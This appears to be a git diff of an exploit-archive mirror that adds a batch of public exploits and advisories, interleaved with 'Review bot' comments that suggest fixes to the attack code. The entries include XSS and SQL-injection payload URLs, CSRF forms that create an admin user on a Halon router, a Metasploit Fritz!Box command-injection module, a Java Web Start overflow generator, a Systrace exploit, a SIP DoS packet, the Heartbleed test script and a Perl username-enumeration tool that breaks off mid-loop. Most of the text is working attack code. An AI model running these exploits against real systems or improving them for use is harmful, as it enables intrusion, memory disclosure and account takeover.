BBSXP 5.13 and prior are vulnerable.
http://www.example.com/bbs/error.asp?message=xss


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33416/info
OBLOG is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/oblog/err.asp?message=xss


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33431/info
LDF is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[ldf path]/login.asp?user=[SQL COMMAND]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33439/info
Lootan is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[path]/login.asp?username=[SQL COMMAND]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33365/info
MoinMoin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to MoinMoin 1.8.1 are vulnerable.
http://www.example.com/moinmoin/WikiSandBox?rename="><script>alert('rename xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script>


@ -0,0 +1,119 @@
ADVISORY INFORMATION
Advisory Name: Multiple Security Vulnerabilities in Halon Security Router
Date published: 2014-04-07
Vendors contacted: Halon Security (http://www.halon.se)
Researcher: Juan Manuel Garcia (http://www.linkedin.com/in/juanmagarcia)
VULNERABILITIES INFORMATION
Vulnerabilities:
1. Reflected Cross-Site Scripting (XSS) {OWASP Top 10 2013-A3}
2. Cross-site Request Forgery (CSRF) {OWASP Top 10 2013-A8}
3. Open Redirect {OWASP Top 10 2013-A10}
Severities:
1. Reflected XSS: Medium - CVSS v2 Base Score: 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N)
2. CSRF: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
3. Open Redirect: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Affected Applications: Security router (SR) v3.2-winter-r1 and earlier.
Affected Platforms: Software, virtual and hardware
Local / Remote: Remote
Vendor Status: Patched
VULNERABILITIES DESCRIPTION
1. Reflected XSS: https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
2. CSRF: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
3. Open Redirect: https://www.owasp.org/index.php/Open_redirect
TECHNICAL DESCRIPTION AND PROOF OF CONCEPTS
1- Reflected XSS:
At least the following parameters are not properly sanitized:
http://sr.demo.halon.se/commands/logviewer/?log=vic0';</script><script>alert(1)</script>
Parameter: log
http://sr.demo.halon.se/fileviewer/?file=";</script><script>alert(1)</script>
Parameter: file
http://sr.demo.halon.se/system/graphs/?graph='+alert(1)+'
Parameter: graph
http://sr.demo.halon.se/commands/?command='+alert(1)+'
Parameter: command
http://sr.demo.halon.se/system/users/?id='+alert(1)+'
Parameter: id
http://sr.demo.halon.se/config/?uri='+alert(1)+'
Parameter: uri
Other parameters of the application might also be affected.
2- CSRF:
At least the following functions are vulnerable:
Add user: http://xxx.xxx.xxx.xxx/system/users/?add=user
<html>
<body>
<form method="POST" name="form0" action="http://localhost:80/system/users/?add=user">
<input type="hidden" name="checkout" value="17"/>
<input type="hidden" name="apply" value=""/>
<input type="hidden" name="id" value=""/>
<input type="hidden" name="old_user" value=""/>
<input type="hidden" name="user" value="hacker"/>
<input type="hidden" name="full-name" value="ITFORCE H4x0r"/>
<input type="hidden" name="class" value=""/>
<input type="hidden" name="password" value="1234"/>
<input type="hidden" name="password2" value="1234"/>
</form>
</body>
</html>
DNS configuration: http://xxx.xxx.xxx.xxx/network/dns
<html>
<body>
<form method="POST" name="form0" action="http://localhost:80/network/dns/">
<input type="hidden" name="checkout" value="17"/>
<input type="hidden" name="apply" value=""/>
<input type="hidden" name="name-servers" value="8.8.8.8"/>
<input type="hidden" name="search-domain" value=""/>
<input type="hidden" name="host-name" value="sr.demo.halon.se"/>
</form>
</body>
</html>
Network Configuration: http://xxx.xxx.xxx.xxx/network/basic
Load Balancer Configuration: http://xxx.xxx.xxx.xxx/network/loadbalancer
VPN Configuration: http://xxx.xxx.xxx.xxx/network/vpn
Firewall Configuration: http://xxx.xxx.xxx.xxx/network/firewall
Other functions of the application might also be affected.
3- Open Redirect:
At least the following parameters are not properly sanitized:
http://sr.demo.halon.se/cluster/?switch_to=&uri=http://itforce.tk
Parameter: uri
http://sr.demo.halon.se/config/?checkout=17&uri=http://itforce.tk
Parameter: uri
Other parameters of the application might also be affected.
SOLUTION
Install / Upgrade to Security router (SR) v3.2r2
REPORT TIMELINE
2014-04-03: IT Force notifies the Halon team of the vulnerabilities and receives the support ticket ID ZOJ-105816.
2014-04-04: Vendor acknowledges the receipt of the information and informs that the vulnerabilities are going to be resolved in v3.2r2 and updates the SR online demo site.
2014-04-04: IT Force advises Halon on how to resolve the vulnerabilities reported.
2014-04-04: IT Force coordinate with Halon the advisory publication for April 07,2014.
2014-04-07: IT Force published the advisory.
CONTACT INFORMATION
www.itforce.tk


@ -0,0 +1,102 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'Fritz!Box Webcm Unauthenticated Command Injection',
'Description' => %q{
Different Fritz!Box devices are vulnerable to an unauthenticated OS command injection.
This module was tested on a Fritz!Box 7270 from the LAN side. The vendor reported the
following devices vulnerable: 7570, 7490, 7390, 7360, 7340, 7330, 7272, 7270,
7170 Annex A A/CH, 7170 Annex B English, 7170 Annex A English, 7140, 7113, 6840 LTE,
6810 LTE, 6360 Cable, 6320 Cable, 5124, 5113, 3390, 3370, 3272, 3270
},
'Author' =>
[
'unknown', # Vulnerability discovery
'Fabian Braeunlein <fabian@breaking.systems>', #Metasploit PoC with wget method
'Michael Messner <devnull@s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '103289' ],
[ 'BID', '65520' ],
[ 'URL', 'http://www.kapple.de/?p=75' ], #vulnerability details with PoC
[ 'URL', 'https://www.speckmarschall.de/hoere.htm' ], #probably the first published details (now censored)
[ 'URL', 'http://pastebin.com/GnMKGmZ2' ], #published details uncensored from speckmarschall
[ 'URL', 'http://www.avm.de/en/Sicherheit/update_list.html' ], #vendor site with a list of vulnerable devices
[ 'URL', 'http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii' ] #wirteup with PoC
],
'DisclosureDate' => 'Feb 11 2014',
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'Automatic Targeting', { } ],
],
'DefaultTarget' => 0
))
end
def check
begin
res = send_request_cgi({
'uri' => '/cgi-bin/webcm',
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code)
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def execute_command(cmd, opts)
begin
res = send_request_cgi({
'uri' => '/cgi-bin/webcm',
'method' => 'GET',
'vars_get' => {
"var:lang" => "&#{cmd}",
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:linemax => 90
)
end
end
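Review bot: `check` returns `Exploit::CheckCode::Detected` for any 200, 301 or 302 response to `GET /cgi-bin/webcm`, which shows only that the CGI endpoint answers, not that the firmware is unpatched. A device carrying the vendor fix may well respond the same way, so this result should not be recorded as a vulnerability finding in an assessment without confirming the firmware version against the vendor's update list. A comment above the method would make that explicit: `# Detected = /cgi-bin/webcm is reachable; the firmware patch level is not verified here`. Two comment typos are also worth fixing: the header reads `http//metasploit.com/download` (missing colon) and the last reference comment says `wirteup`.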

170
platforms/ios/remote/32738.txt Executable file

@ -0,0 +1,170 @@
Document Title:
===============
Bluetooth Text Chat v1.0 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1250
Release Date:
=============
2014-04-07
Vulnerability Laboratory ID (VL-ID):
====================================
1250
Common Vulnerability Scoring System:
====================================
9.1
Product & Service Introduction:
===============================
BlueTooth Text Chat is a simple way to chat with near by users. Application works on BlueTooth. User can send text messages.
Pictures can be embedded in messages. It is a very simple app for quick chat. Application is compatible with `BlueMe` app series.
(Copy of the Homepage: https://itunes.apple.com/us/app/bluetooth-text-chat/id495083008 )
Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered a remote code execution web vulnerability in the official Bluetooth Text Chat v1.0 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-04-07: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
HyTech Professionals
Product: Bluetooth Text Chat - iOS Mobile Web Application 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A remote code execution web vulnerability has been discovered in the official Bluetooth Text Chat v1.0 iOS mobile application.
The vulnerability allows an remote attackers to execute own malicious system specific codes to compromise the iOS mobile application.
The vulnerability is located in the message body input and affects the bluetooth message listing. Remote attackers are able to inject
own system specific codes in the bluetooth message listing to compromise mobile application. The message input is not encoded or parsed
and the app functions itself only allows to send text and pictures of the local storage (phone album). The exploit can also be combined with
a loop codes to crash the app or own web script codes (htmls,php or js) to perform further attacks and persistent manipulation of modules.
The injection method requires an exchange with another connected bluetooth chat user and the attack vector is located on the application-side
of the vulnerable mobile application. The attacker includes his message with the code execution payload and the code execution occurs after
the message has been send to the local bluetooth service. The execution of the system specific code occurs in the chat messages output listing
and chat history. The code execution in the message listing does not require a link ref click or mouse-over (interaction) and executed directly
on the arrival. The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability
scoring system) count of 9.1(+)|(-)9.2.
Exploitation of the code execution vulnerability requires a connected bluetooth user to chat and no privileged account. User interaction connect
and accept is required to interact with another user via bluetooth. Successful exploitation of the remote vulnerability results in mobile
application compromise and connected or affected device component compromise.
Request Method(s):
[+] Bluetooth (Chat > POST)
Vulnerable Module(s):
[+] Chat Message
Vulnerable Parameter(s):
[+] body > message
Affected Module(s):
[+] Messages Listing & History
Proof of Concept (PoC):
=======================
The system specific code execution vulnerability can be exploited by remote attackers via bluetooth, without required user interaction but the connection
for messaging needs to be accepted. For security demonstration or to reproduce the code execution vulnerability follow the provided information and steps
below to continue.
Requirement(s):
1. 2 x iOS devices (Tested: iPhone (A) and a iPad (B) with iOS v7.1)
2. Mobile application > https://itunes.apple.com/us/app/bluetooth-text-chat/id495083008
3. Both devices need the bluetooth module (active)
Manually steps to reproduce the vulnerability ...
1. Install the application on both ios devices ( https://itunes.apple.com/us/app/bluetooth-text-chat/id495083008 )
2. Start both applications and sync the bluetooth chat connection of device A to B
3. Accept the connection at device B of the A device request
4. Include a system specific code inside of the message body input field and press send/submit
5. The code execution occurs to everybody (A & B) who is listed as user in the same chat conversation
Note: The target user does not need to click or interact with the attacker the message only needs to arrive
6. Successful reproduce of the bluetooth text chat remote code execution vulnerability!
Picture(s):
http://www.vulnerability-lab.com/resources/pictures/1250/1.png
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable message body input.
The vulnerable output message and history listing needs to be encoded separatly to prevent script code injects, command executions or futher code exec attacks.
Security Risk:
==============
The security risk of the remote code execution web vulnerability in the Bluetooth Text Chat v1.0 is estimated as critical.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33360/info
Apache Jackrabbit is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Apache Jackrabbit 1.5.2 are vulnerable.
http://www.example.com/search.jsp?q=%25%22%3Cscript%3Ealert(1)%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33360/info
Apache Jackrabbit is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Apache Jackrabbit 1.5.2 are vulnerable.
http://www.example.com/swr.jsp?q=%25"<script>alert(1)</script>&swrnum=1

9
platforms/linux/dos/32740.txt Executable file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33352/info
QNX RTOS is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause a kernel panic, denying service to legitimate users.
QNX RTOS 6.4.0 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/32740.bin

13
platforms/linux/dos/32749.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/33414/info
Pidgin is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.
Successful exploits will cause the affected application to crash, effectively denying service to legitimate users.
Pidgin 2.4.1 is vulnerable; other versions may also be affected.
NOTE: This issue was previously thought to be a subset of the vulnerability documented in BID 29956 (Pidgin 'msn_slplink_process_msg()' Multiple Integer Overflow Vulnerabilities), but has been given its own record to properly document the vulnerability.
Sending a filename that contains the maximum number of allowable characters and that includes the characters defined by the hex data below will crash the application.
'26 23 38 32 32 37 3b 20 26 23 38 32 32 38 3b 20 26 23 38 32 32 39 3b 20 85'

17
platforms/linux/local/32751.c Executable file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/33417/info
Systrace is prone to a local privilege-escalation vulnerability.
A local attacker may be able to exploit this issue to bypass access control restrictions and make unintended system calls, which may result in an elevation of privileges.
Versions prior to Systrace 1.6f are vulnerable.
int
main(int argc, const char* argv[])
{
/* Syscall 1 is exit on i386 but write on x86_64. */
asm volatile("movl $1, %eax\n"
"int $0x80\n");
for (;;);
}

139
platforms/linux/remote/30284.vbs Executable file

@ -0,0 +1,139 @@
source: http://www.securityfocus.com/bid/24832/info
Sun Java Runtime Environment is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely result in a denial-of-service condition.
This issue affects these versions:
Java Runtime Environment 6 update 1
Java Runtime Environment 5 update 11
Prior versions are also affected.
'-----------------------------------------------------------------------------------------------
' Java Web Start Buffer Overflow POC Exploit
'
' FileName: JavaWebStartPOC.VBS
' Contact: ZhenHan.Liu#ph4nt0m.org
' Date: 2007-07-10
' Team: http://www.ph4nt0m.org
' Enviroment: Tested on JRE 1.6, javaws.exe v6.0.10.6
' Reference: http://seclists.org/fulldisclosure/2007/Jul/0155.html
' Usage: I did not put a real alpha shellcode here, you'd replace it with your own.
'
' Code(javaws.exe):
' .text:00406208 ; *************** S U B R O U T I N E ***************************************
' .text:00406208
' .text:00406208 ; Attributes: bp-based frame
' .text:00406208
' .text:00406208 sub_406208 proc near ; CODE XREF: sub_405468+4E p
' .text:00406208
' .text:00406208 FileName = byte ptr -540h
' .text:00406208 FindFileData = _WIN32_FIND_DATAA ptr -140h
' .text:00406208 arg_0 = dword ptr 8
' .text:00406208 arg_4 = dword ptr 0Ch
' .text:00406208
' .text:00406208 push ebp ; FileName 1k Buffer
' .text:00406209 mov ebp, esp
' .text:0040620B sub esp, 540h
' .text:00406211 push 5Fh
' .text:00406213 push 2Fh
' .text:00406215 push [ebp+arg_0]
' .text:00406218 call sub_40544D
' .text:00406218
' .text:0040621D push 5Fh
' .text:0040621F push 3Ah
' .text:00406221 push [ebp+arg_0]
' .text:00406224 call sub_40544D
' .text:00406224
' .text:00406229 add esp, 18h
' .text:0040622C push 2Ah
' .text:0040622E push [ebp+arg_0] ; codebase buffer
' .text:00406231 push 5Ch
' .text:00406233 push offset s_Si ; "si"
' .text:00406238 push 5Ch
' .text:0040623A push offset s_Tmp_0 ; "tmp"
' .text:0040623F push 5Ch
' .text:00406241 call sub_40615B
' .text:00406241
' .text:00406246 push eax
' .text:00406247 lea eax, [ebp+FileName]
' .text:0040624D push offset s_SCSCSCSC ; "%s%c%s%c%s%c%s%c"
' .text:00406252 push eax ; char *
' .text:00406253 call _sprintf ; sprintf copy codebase to 1k stack buffer lead to buffer over flow
' .text:00406253
' .text:00406258 add esp, 28h
' .text:0040625B lea eax, [ebp+FindFileData]
' .text:00406261 push eax ; lpFindFileData
' .text:00406262 lea eax, [ebp+FileName]
' .text:00406268 push eax ; lpFileName
' .text:00406269 call ds:FindFirstFileA
' .text:0040626F cmp eax, 0FFFFFFFFh
' .text:00406272 jnz short loc_406278
' .text:00406272
' .text:00406274 xor eax, eax
' .text:00406276 leave
' .text:00406277 retn
' .text:00406277
' .text:00406278 ; ---------------------------------------------------------------------------
' .text:00406278
' .text:00406278 loc_406278: ; CODE XREF: sub_406208+6A j
' .text:00406278 push esi
' .text:00406279 mov esi, [ebp+arg_4]
' .text:0040627C lea ecx, [ebp+FindFileData' .cFileName]
' .text:00406282 mov edx, ecx
' .text:00406284 sub esi, edx
' .text:00406284
' .text:00406286
' .text:00406286 loc_406286: ; CODE XREF: sub_406208+86 j
' .text:00406286 mov dl, [ecx]
' .text:00406288 mov [esi+ecx], dl
' .text:0040628B inc ecx
' .text:0040628C test dl, dl
' .text:0040628E jnz short loc_406286
' .text:0040628E
' .text:00406290 push eax ; hFindFile
' .text:00406291 call ds:FindClose
' .text:00406297 xor eax, eax
' .text:00406299 inc eax
' .text:0040629A pop esi
' .text:0040629B leave
' .text:0040629C retn
' .text:0040629C
' .text:0040629C sub_406208 endp
'-----------------------------------------------------------------------------------------------
If WScript.Arguments.Count <> 1 Then
WScript.Echo WScript.ScriptName & " <FileName>"
WScript.Quit
End If
sFileName = WScript.Arguments(0)
On Error Resume Next
Set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
Set oFS = oFSO.CreateTextFile(sFileName)
If Err.Number <> 0 Then
WScript.Echo "Error: Failed Create File."
WScript.Quit
End If
c = Chr(&H04)
alphaShellcode = "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII"
oFS.WriteLine "<?xml version=""1.0"" encoding=""utf-8""?>"
oFS.WriteLine "<jnlp spec=""1.0+"" codebase=""http://" & String(12000000, c) & alphaShellcode & String(24, c) & """ href=""test.jnlp"">"
oFS.WriteLine "</jnlp>"
If Err.Number <> 0 Then
WScript.Echo "Error: Failed Write File."
Err.Clear
End If
oFS.Close
Set oFS = Nothing
Set oFSO = Nothing
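Review bot: The file is added as `platforms/linux/remote/30284.vbs`, but everything in it is Windows-specific: it runs under Windows Script Host, its header says it was tested against `javaws.exe v6.0.10.6`, and the quoted disassembly calls `FindFirstFileA`. If the platform directory is meant to describe the affected target, `windows` looks like the better fit; this should be confirmed against the file's `files.csv` row, which is not visible here. Separately, both failure branches only echo a message, so the script exits with status 0 even when the file could not be created or written; `WScript.Quit 1` on those paths would let a caller detect the failure.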


@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/27110/info
Asterisk is prone to a remote denial-of-service vulnerability.
Exploiting this issue allows remote attackers to cause the application to crash, effectively denying service to legitimate users.
BYE sip:303@10.0.0.15 SIP/2.0
Via: SIP/2.0/UDP 10.0.0.100:7279;branch=z9hG4bK976ed70381c64bc6a5ec25b63f3df402
To: <sip:303@10.0.0.15>;tag=as664746ba
From: <sip:user@10.0.0.15>;tag=0509943750
Call-ID: 11f5ae5ba1e04a25a1184ff158654371
CSeq: 3 BYE
Max-Forwards: 70
Also: sip:303@10.0.0.15


@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29718/info
GSC Client is prone to a privilege-escalation vulnerability because it fails to sufficiently validate administrator credentials.
An attacker can exploit this vulnerability to perform unauthorized administrative actions; other attacks are also possible.
GSC Client 1.00 2067 is vulnerable; other versions may also be affected.
NOTICE <user> :KICK <channel id> :<kick message>


@ -0,0 +1,136 @@
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
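Review bot: `recvall` computes the remaining time in `rtime` but then waits with `select.select([s], [], [], 5)`, so the `timeout` argument never reaches the wait and a call can block up to five seconds past its deadline; it should be `select.select([s], [], [], rtime)`. The heartbeat record is also written twice, once by `s.send(hb)` in `main` and again on the first line of `hit_hb`, so one of the two sends should be dropped. The socket is never closed and `connect` relies on the OS default timeout; calling `s.settimeout(...)` before `connect` and wrapping the exchange in `try`/`finally: s.close()` would bound a run against a filtered port. `hexdump(pay)` prints whatever the server returned, which on an affected host is process memory, so the output of a run against a production system should be handled as sensitive data. The same `recvall` and double-send code appears in the multi-version variant added later in this commit.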


@ -0,0 +1,182 @@
source: http://www.securityfocus.com/bid/33489/info
Sun Java System Access Manager is prone to a username-enumeration weakness because of a design error in the application when verifying user-supplied input.
Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks.
This issue affects the following versions:
Sun Java System Access Manager 6 2005Q1 (6.3)
Sun Java System Access Manager 7 2005Q4 (7.0)
Sun Java System Access Manager 7.1
Sun OpenSSO is also reported vulnerable.
#!/usr/bin/perl -w
# POC: Sun Java Access Manager and Identity Manager Users Enumeration
# Developed for OWASP Testing guide V3
# Simple script for Sun Java access manager and Identity Manager users enumeration
#
# Author : Marco Mella <marco.mella <at> aboutsecurity.net>
# Site : www.aboutsecurity.net
#
# © Copyright, 2008-2009 Marco Mella
# Sun Java System Access Manager and Sun Java System Identity Manager
# are trademarks or registered trademarks of Sun Microsystems, Inc.
#
# Last updated: 13 Jun 2008
#
use Getopt::Long;
use LWP::UserAgent;
use Switch;
$Userfile = "";
$line="";
my ($server, $user_file, $switch);
my $banner = "Author: Marco Mella <marco.mella <at> aboutsecurity.net>\n";
my $usage= "Usage:\n $0 -server <ip_address|host> -port <tcp port> -userfile <filename> -switch<am|idm> \n\n";
my $opt = GetOptions (
'server=s' => \$Server,
'port=s' => \$Port,
'userfile=s' => \$Userfile,
'switch=s' => \$Switch );
print "\n\n\n\n+-----------------------------------------------------------------------------------+\n\n";
print " Sun Java Access Manager and Identity Manager User Enumeration \n";
print " ".$banner."\n";
print "+-----------------------------------------------------------------------------------+\n\n";
if ( !$Server || !$Userfile ||!$Port || !$Switch) {
print $usage;
exit(1);
}
if ( $Switch eq "am" ) {
open(Userfile) or die("Could not open file: $Userfile\n\n");
print "Users enumeration Sun java System Access Manager\n\n ";
foreach $line (<Userfile>) {
my $url = 'https://'.$Server.':'.$Port.'/amserver/UI/Login?user='.$line;
my $browser = LWP::UserAgent->new;
my $response = $browser->get($url);
my @headers = $response->header_field_names;
#print "response headers: @headers\n";
$response->is_success or
die "Failed to GET '$url': ", $response->status_line, "\n Aborintg";
#print $response->as_string;
chomp($line);
# Analysis of response and title of web page received
if(($response->content =~ m{This user is not active} ) || ($response->title =~ m{User Inactive})) {
# print $response->content;
# print "\n\n\n\n";
# print $response->title;
print "\n\tUser: $line not valid\n\n"}
elsif (($response->content =~ m{No configuration found} ) || ($response->title =~ m{No Configuration Error})) {
print "\n\tUser: $line yeah ... Active user! \n\n"}
elsif ($response->content =~ m{Your account has been locked.} ) {
print "\n\tUser: $line Exist but Account has been locked\n\n"}
else {
print "\n\tUser: $line Active ???? Maybe you have to analizing the error message received \n\n"}
}
print "\n\n";
close(Userfile);
}
if ( $Switch eq "idm" ) {
open(Userfile) or die("Could not open file: $Userfile\n\n");
print "Users enumeration Sun java System Identity Manager - Login Feature Analysis\n\n ";
foreach $line (<Userfile>) {
